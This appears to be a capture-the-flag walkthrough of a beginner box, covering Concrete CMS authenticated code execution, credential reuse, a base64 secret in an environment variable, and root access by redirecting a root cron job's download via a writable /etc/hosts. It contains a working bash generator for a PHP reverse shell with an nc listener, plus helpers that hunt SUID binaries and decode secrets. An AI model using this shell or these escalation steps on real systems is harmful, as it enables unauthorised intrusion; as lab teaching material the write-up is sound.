mKingdom

Beginner-friendly box inspired by a certain mustache man.

Recon

Let's start with an nmap scan. Only one port is open: 85, served by Apache httpd 2.4.7. The page title suggests the site has been defaced.

Visiting the site, we are greeted with a picture of Bowser, the famous villain from Mario.

We enumerate with Gobuster.

Manually and with Gobuster we reach a blog at the endpoint /app/castle.

There is only one blog post.

The blog runs Concrete CMS (concrete5). In the page source we also find the version in use: 8.5.2, which is vulnerable to authenticated remote code execution.

This vulnerability is explained step by step in the following post. The requirement is possession of admin credentials: an admin can modify the upload restrictions by adding file types, then upload and trigger a PHP reverse shell.

Initial Access

We know about the possible entry point through authenticated RCE, but we still need credentials.

We can log in with the username admin and a very weak password that starts with p.

We are logged in and can access the admin dashboard.

Select System & Settings, then Allowed File Types.

Next, add php to the list, separated by a comma, and save the changes.

We can use the reverse shell from PentestMonkey.

To upload files, we simply drag them into the File Manager at /app/castle/dashboard/files/search. The File Manager gives us the URL of the uploaded file. Before visiting it, we set up a listener on our chosen port.

Next, we visit the link presented.
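As an added example (not code from the original writeup), here is a small bash helper that writes a minimal PHP reverse shell with the attacker address baked in, in the same spirit as the PentestMonkey script, and a function to start the matching nc listener. The address 10.0.0.1 and port 4444 are placeholders; fsockopen() opens the TCP connection back to the listener and proc_open() wires /bin/sh's stdin, stdout and stderr straight to that socket.

```shell
#!/usr/bin/env bash
# Added example: generate a minimal PHP reverse shell and start a listener.
# The attacker IP and port are placeholders, not values from the box.

# Write a small PHP reverse shell to $1 that connects back to $2:$3.
write_php_shell() {
    local out="$1" ip="$2" port="$3"
    cat > "$out" <<EOF
<?php
// Added example reverse shell (placeholder address, not the box's payload).
\$sock = fsockopen("$ip", $port);
if (!\$sock) { exit(1); }
// Attach the shell's stdin/stdout/stderr directly to the socket.
\$desc = array(0 => \$sock, 1 => \$sock, 2 => \$sock);
\$proc = proc_open("/bin/sh -i", \$desc, \$pipes);
// Block until the shell exits so the PHP worker keeps the socket alive.
proc_close(\$proc);
EOF
    echo "$out"
}

# Sanity check before uploading: show where the generated shell connects to.
shell_targets() {
    grep -o 'fsockopen("[^"]*", [0-9]*)' "$1"
}

# Start the listener the shell connects back to (run in a separate terminal).
start_listener() {
    nc -lvnp "$1"
}

# Usage (commented out so the file can be sourced without side effects):
#   write_php_shell shell.php 10.0.0.1 4444
#   start_listener 4444
#   # then drag shell.php into /app/castle/dashboard/files/search and open
#   # the URL the File Manager returns.
```

The same file also works as a quick check on any other PHP payload you upload: if shell_targets prints nothing, the file does not contain the callback you think it does.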

We get a connection from our reverse shell as www-data. Unfortunately, the user flag is not readable by this user, so we have to move laterally. By inspecting /etc/passwd we find two users, toad and mario.

We run linpeas.sh and discover that cat is a SUID binary owned by the user toad. Running cat as any user therefore executes it with toad's effective privileges: it can read what toad can read, and nothing more.

MySQL is running internally. Maybe we can retrieve some credentials from the web app's configuration.

By examining the CMS configuration files, we find the database credentials. Exploring the database itself might not reveal any new users, but it's worth checking whether the same credentials are reused elsewhere.

The password is reused: we are able to switch to the user toad with it.

While enumerating the target manually as toad, we find a suspicious password token, encoded in base64, in an environment variable.

We decode it and switch to mario.

In mario's home directory we find the user flag, but we can't read it with cat: the SUID bit makes cat run as toad, who has no read access to mario's files. We look for another copy of cat on the machine and find one at /usr/lib/klibc/cat, which is not SUID. With that, we can read the user flag.
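The three enumeration steps of the lateral-movement stage (spotting the SUID cat, finding a non-SUID copy of it, and surfacing base64-encoded secrets in the environment) as reusable bash functions. This is an added example, not part of the original writeup; the paths in the usage comments are assumptions taken from the text above, and the helpers are generic rather than tied to this box.

```shell
#!/usr/bin/env bash
# Added example: enumeration helpers for the lateral-movement stage.
# Nothing here is specific to mKingdom; usage paths are assumptions.

# List SUID files under $1 (default /). -perm -4000 matches any file with
# the setuid bit. A SUID copy of cat is a trap rather than a gift: it runs
# with its owner's effective uid (toad), so it can read only what toad can
# read, not files private to the invoking user (mario).
list_suid() {
    find "${1:-/}" -type f -perm -4000 2>/dev/null | sort
}

# Find copies of the binary named $1 under $2 (default /) that do NOT carry
# the setuid bit; those run as the caller and can read the caller's files.
find_non_suid_copies() {
    find "${2:-/}" -type f -name "$1" ! -perm -4000 2>/dev/null | sort
}

# Read NAME=VALUE lines on stdin (e.g. the output of `env`) and print
# NAME=<decoded> for every VALUE that looks like base64 and decodes to
# printable text. Values that merely use the base64 alphabet (a path such
# as /usr/bin) are rejected by the length and printability checks.
decode_b64_env() {
    local line name val dec
    while IFS= read -r line; do
        name=${line%%=*}
        val=${line#*=}
        # base64 alphabet only, optional padding, length a multiple of 4
        printf '%s' "$val" | grep -Eq '^[A-Za-z0-9+/]{8,}={0,2}$' || continue
        [ $(( ${#val} % 4 )) -eq 0 ] || continue
        dec=$(printf '%s' "$val" | base64 -d 2>/dev/null) || continue
        [ -n "$dec" ] || continue
        # skip anything that decoded to binary junk rather than a secret
        printf '%s' "$dec" | LC_ALL=C grep -q '[^[:print:]]' && continue
        printf '%s=%s\n' "$name" "$dec"
    done
}

# Usage on the target (run after landing as www-data or toad):
#   list_suid /                    # expect cat in the list, owned by toad
#   find_non_suid_copies cat /     # e.g. /usr/lib/klibc/cat
#   env | decode_b64_env           # surfaces base64-encoded secrets
```

Run list_suid with `ls -l` on each result to see the owner: a SUID binary owned by root is a privilege-escalation candidate, while one owned by an unprivileged user such as toad only ever grants that user's rights.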

Privilege Escalation

We upload and run pspy64 on the machine to discover processes running in the background.

Here we find a cron job, running as root, that uses cURL to download a script from mkingdom.thm and execute it. If we can write to /etc/hosts, we can point mkingdom.thm at our own machine and serve a malicious script that spawns a reverse shell for us.

We confirm that /etc/hosts is writable by mario.

With nano or vi we update /etc/hosts and replace the existing IP for mkingdom.thm with our own IP address.

Next, we recreate the folder structure the cron job requests, create the script, place it in the correct location, and serve it with a Python web server on port 85. Alongside this, a listener is running on our chosen port.

After some time, the cron job fires and the script gets downloaded and executed.

We get a reverse shell back as root, and we can read the root flag in root's home directory using cat.
